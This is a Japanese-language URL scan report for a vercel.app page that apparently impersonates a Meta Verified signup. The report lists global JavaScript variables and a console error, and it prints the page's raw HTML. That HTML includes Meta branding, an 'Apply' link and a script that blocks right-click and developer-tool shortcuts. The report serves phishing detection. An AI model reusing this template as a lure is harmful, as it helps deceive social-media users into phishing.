- スキャンID:
- ae79b443-eb0d-4556-868c-5e4c7e9bc80e終了
- 送信済みURL:
- https://page-verify-for-opprtunity.vercel.app/
- レポート終了日:
リンク · 0件検出
ページから特定された発信リンク
JavaScript変数 · 3件検出
ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です
名前 | 規模 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
コンソールログメッセージ · 1件検出
Webコンソールにログ記録されたメッセージ
規模 | 分類 | ログ |
---|---|---|
error | network |
|
HTML
未加工のHTMLページ本文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Home</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet">
<link rel="icon" href="https://pbs.twimg.com/media/GQB99gQaQAEUOZ7?format=png&name=small">
<style>
body {
font-family: system-ui;
margin: 0;
padding: 0;
}
.container-fluid {
background: #F5F6F6;
}
.btn {
background: #0064e0;
border: none;
border-radius: 100px;
padding: 10px 35px;
text-decoration: none;
color: white;
display: inline-block;
margin-top: 1rem;
font-family: Arial, sans-serif;
font-size: 16px;
}
.content {
margin-top: 3rem;
display: flex;
justify-content: center;
}
.content .col-sm-6 {
margin-top: 3rem;
margin-left: 5rem;
}
.content p {
font-size: 18px;
margin-top: 1rem;
font-family: Arial, sans-serif;
}
.sign-up {
font-size: 17px;
padding-top: 1rem;
font-family: Arial, sans-serif;
}
.business-info {
font-size: 14px;
font-family: Arial, sans-serif;
}
.region-info {
font-size: small;
opacity: 95%;
font-family: Arial, sans-serif;
}
.image {
display: none;
width: 42%;
height: 100vh;
background-size: cover;
}
@media (min-width: 576px) {
.image {
display: block;
}
}
</style>
</head>
<body>
<div class="container-fluid">
<img width="120px" src="Meta-Logo.png-2560px-Meta-Logo.png" alt="Meta Logo">
</div>
<div class="content">
<div class="col-sm-6">
<img width="80px" src="verified.png" alt="Meta Verified Icon">
<h1 class="my-3 fs-1">Become <br> Meta Verified</h1>
<div style="margin-bottom: 30px;"></div>
<a href="help.html" class="btn">Apply</a>
<p class="mt-4">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
<p class="sign-up">Sign up now for creators</p>
<p class="mt-4 mb-0">
<span class="fw-semibold">Are you a business?</span> Get more information on
</p>
<a href="#" class="business-info">Meta verified for businesses</a> <br><br>
<i class="region-info">Features, availability, and pricing may vary by region.</i>
</div>
<div class="col-sm-5 image" style="background-image: url('https://pbs.twimg.com/media/GPUPRg0a8AACTSj?format=jpg&name=small');"></div>
</div>
<script>
document.addEventListener('contextmenu', function(e) {
e.preventDefault();
});
document.onkeydown = function(e) {
if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
e.preventDefault();
}
};
</script>
</body></html>